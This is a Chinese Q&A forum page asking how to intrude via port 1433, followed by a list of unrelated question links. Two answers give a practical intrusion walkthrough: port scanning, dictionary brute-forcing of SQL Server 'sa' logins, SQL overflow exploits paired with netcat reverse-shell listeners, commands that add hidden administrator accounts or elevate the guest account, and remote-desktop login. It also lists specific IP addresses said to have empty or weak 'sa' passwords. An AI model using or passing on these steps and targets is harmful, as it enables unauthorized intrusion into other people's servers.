问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

1433入侵问题

发布网友 发布时间:2024-10-10 07:52

我来回答

2个回答

热心网友 时间:2024-11-13 18:58

楼上说的都是废话!扫描到sql弱口令了,用sqltools连接之后,你可以直接用以下命令在对方电脑上加入一个管理员账户!
net user 用户名 密码 /add 回车
net localgroup administrators 用户名 /add 回车
然后接着用那个sqltools上传一个开3389的程序!让其在对方电脑上自动运行!
然后用终端登录器登录试试!一般登录器xp系统本身就有!
当然你也可以像楼上说的那样!直接将guest账户激活,提升权限为管理员!

热心网友 时间:2024-11-13 19:07

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。

218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"

在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

呵呵,基本就是这样了,,,,
参考资料:http://www.blog.edu.cn/user1/17098/archives/2006/1473706.shtml
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
写论文值得推荐的app 写论文app大全汇总 有啥好用又免费的文献查阅网站吗? 高仿苹果手机关机关不了机?是怎么回事?有那个朋友请告知! 高仿苹果6开机就是白屏黑苹果,关机关不了 怎么把电子相册保存到QQ空间相册 整个乡村音乐史上,最动人的25首歌 写给狗的歌 右侧肢体肌力4级是什么意思 肌力分级的评定标准 肌力4级是什么意思 扫1433服务器和3389服务器必要那些工具啊 求助 液压泵工作但是油上不去怎么回事 扫1433服务器和3389服务器必要那些工具啊 求助 下身无直觉瘫痪性功能失去大小便失禁,双腿的伸展肌力几乎为0级,属于几... 红茶的功效与作用喝红茶对身体的好处 喝茶红茶还得癌症,红茶能抗癌吗? 红茶对人体有什么功效 什么是爱情三方关系? 爱情中互动是什么意思? 大鼎教育怎么样,大鼎教育好不好 门口放什么柜子最旺运最好 门口放什么柜子最旺运 梦见自己喝草甘膦 将草甘膦用注射器注入自己的手臂,结果整个手肿涨,怎么办? 女的自己喝草甘膦了从医院出来了,我们要不要备案 国外买家要自己检测所购产品的农残等指标,有何潜在问题? 草甘膦什么牌子好 关于农行网银卡得问题,高手来!~急 农行网银的问题,希望高手解答下 农行的网上银行问题,高手进 1433入侵问题 135,3389.445.1433端口拿下主机 135,3389.445.1433端口拿下主机 1433抓服务器 1433抓服务器 韩国首尔近两成小学新生不足50人,为何会出现这种情况? 与搜索广告相比,抖音信息流广告的优势是什么? 联想x240带16G的ssd,今天装了SVN软件重启后,无法识别SSD硬盘(磁盘管理器... ...得到30个这时的总数比原来还多1/9问原来有多少个? ThinkPad X240这个系列,有哪些型号是出厂标配有带16G固态硬盘的? 我学电影后期的,用什么笔记本电脑好?不要回答说台式比较划算什么的,我... 艺考文化课是什么 ...学校合唱队人数的9分之5是女生,女生有30人,男女生有多少人(方程... 学校合唱队有学生9o人,其中男生人数是女生的4/5,男女牛各有多少人 学校合唱队的人数的9分之5是女生,合唱队男生有几人 学校合唱队有女生30人,占合唱队总人数的九分之五,合唱队共有多少人 天龙八部画地为牢需要装备什么武器 2016款 保时捷Panamera Panamera S 3万公里保养项目费用 2018款 保时捷Panamera Panamera Turbo 3万公里保养项目费用 2014款 保时捷Panamera Panamera 3万公里保养项目费用